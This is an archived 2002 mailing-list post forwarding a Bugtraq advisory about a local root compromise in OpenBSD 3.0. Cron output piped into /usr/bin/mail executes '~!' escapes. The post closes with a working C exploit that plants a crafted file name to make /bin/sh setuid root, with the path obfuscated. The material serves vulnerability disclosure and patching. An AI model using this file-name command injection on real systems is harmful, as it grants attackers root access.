Subject: [venglin@freebsd.lublin.pl: local root compromise in openbsd 3.0 and below]
To: None <tech-security@netbsd.org>
From: Jan Schaumann <jschauma@netbsd.org>
List: tech-security
Date: 04/11/2002 14:30:52
As seen on bugtraq just now.
The default crontab of root does not contain the mail-command, but
/etc/daily does, I believe. Thus, if some mischievous black sole were
somehow to create such a file in /etc/security we'd be SOL as well.
(Now how that person could create the file in /etc/security is a
different story)
----- Forwarded message from Przemyslaw Frasunek <venglin@freebsd.lublin.pl> -----
> Date: Thu, 11 Apr 2002 13:29:28 +0200
> From: Przemyslaw Frasunek <venglin@freebsd.lublin.pl>
> To: bugtraq@securityfocus.com
> Subject: local root compromise in openbsd 3.0 and below
>
> There is a local root compromise in OpenBSD 3.0-current (and below, before 8 Apr
> 2002).
>
> Full problem report and exploit below. FreeBSD is not vulnerable.
>
> ----- Forwarded message from urbanek@openbsd.cz -----
>
> From: urbanek@openbsd.cz
> To: gnats@openbsd.org
> Subject: user/2536: possible root compromise using /usr/bin/mail
>
> >Number: 2536
> >Category: user
> >Synopsis: crontab entry allows possible arbitrary comand execution
> >Confidential: yes
> >Severity: critical
> >Priority: high
> >Responsible: bugs
> >State: open
> >Class: sw-bug
> >Submitter-Id: net
> >Arrival-Date: Mon Apr 8 13:30:02 MDT 2002
> >Last-Modified:
> >Originator: Milos Urbanek
> >Organization:
>
> >Release: all relases including CURRENT
> >Environment:
>
> System : OpenBSD 3.0
> Architecture: OpenBSD.i386
> Machine : i386
> >Description:
>
> program /usr/bin/mail allows a special escape sequence to
> be specified in the body of an email; this escape sequence
> specifies a shell comand to be executed
>
> as mentioned in mail(1):
>
> ~!command
> Execute the indicated shell command, then return to the message.
>
>
> Problem:
> default root crontab entry looks like:
>
> # do daily/weekly/monthly maintenance
> # on monday only (techie)
> 30 1 * * 1 /bin/sh /etc/daily 2>&1 | tee /var/log/d
> aily.out | mail -s "`/bin/hostname` daily output" root
> 30 3 * * 6 /bin/sh /etc/weekly 2>&1 | tee /var/log/
> weekly.out | mail -s "`/bin/hostname` weekly output" root
> 30 5 1 * * /bin/sh /etc/monthly 2>&1 | tee /var/log/monthly.out | mail -s "`/bin/hostname` monthly output" root
>
>
> If there is something in files /etc/daily, /etc/weekly or /etc/monthly
> which could enable the attacker to insert its own input,
> like a malformed filename
>
> chiba:5$ touch \~!haha
> chiba:6$ ls -al *haha*
> -rw-r--r-- 1 milos milos 0 Apr 8 19:30 ~!haha
>
> or by other means like output from log files under /var/log,
>
> the attacker can execute arbitrary comand running under root
> privileges which can lead to the root compromise.
>
>
> >How-To-Repeat:
> read the man page, and see above
> [...]
>
> ----- End forwarded message -----
>
> Patch: http://www.openbsd.org/cgi-bin/cvsweb/src/usr.bin/mail/collect.c.diff?r1=1.23&r2=1.24
>
> Exploit:
>
> /*
> * (c) 2002 venglin@freebsd.lublin.pl
> *
> * OpenBSD 3.0 (before 08 Apr 2002)
> * /etc/security + /usr/bin/mail local root exploit
> *
> * Run the exploit and wait for /etc/daily executed from crontab.
> * /bin/sh will be suid root next day morning.
> *
> * Credit goes to urbanek@openbsd.cz for discovering vulnerability.
> *
> */
>
> #include <fcntl.h>
>
> int main(void)
> {
> int fd;
>
> chdir("/tmp");
> fd = open("\n~!chmod +s `perl -e 'print \"\\057\\142\\151\\156\\057\\163\\150\"'`\n", O_CREAT|O_WRONLY, 04777);
>
> if (fd)
> close(fd);
> }
>
> --
> * Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
> * Inet: przemyslaw@frasunek.com ** PGP: D48684904685DF43EA93AFA13BE170BF *
----- End forwarded message -----